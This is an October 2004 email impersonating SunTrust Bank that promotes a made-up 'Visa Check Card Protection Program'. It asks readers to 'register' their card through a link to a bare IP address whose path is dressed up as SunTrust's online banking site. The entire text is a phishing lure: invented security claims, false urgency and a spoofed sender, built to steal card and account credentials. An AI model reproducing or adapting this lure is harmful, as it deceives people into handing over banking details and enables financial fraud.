Subject: Urgent Message From SunTrust

From: "SunTrust Bank" <[email-masked]>
Date: Mon, 25 Oct 2004 15:50:41 -0600

SunTrust Visa Check Card Protection Program

In cooperation with other major American banks SunTrust
has developed a new anti-fraud screening solution. 
This is an effort to prevent the recent surge in credit, 
debit card fraud and identity theft.

The system is an advanced neural network that scrutinizes 
card transactions and ATM withdrawals to deliver a highly 
accurate risk score by analyzing the spending behavior of 
each cardholder along with the profile of each merchant and 
ATM. It will try to detect and stop any suspicious or 
fraudulent Visa Check Card activity.

Register with our Visa Check Card Protection Program and you 
can use your card to shop online, in a store, or withdraw 
money at the ATM, and you'll be fully protected from 
unauthorized use of your card or account information. With 
SunTrust's Visa Check Card Protection Program Zero Liability 
policy, your liability for unauthorized transactions is 
$0-you pay nothing!

All major American banks will implement this system within a 
near future.

Note that this program only applies to your SunTrust Visa 
Check Card - which is linked directly to your checking 
account, not SunTrust credit cards.

Please take a moment and follow the link below to securely 
register your card totally free of charge.

http://200.114.234.181/verify/internetbanking.suntrust.com/index.php

Regards,

http://www.suntrust.com
Security Department
Do not reply to this e-mail as it is an unmonitored alias.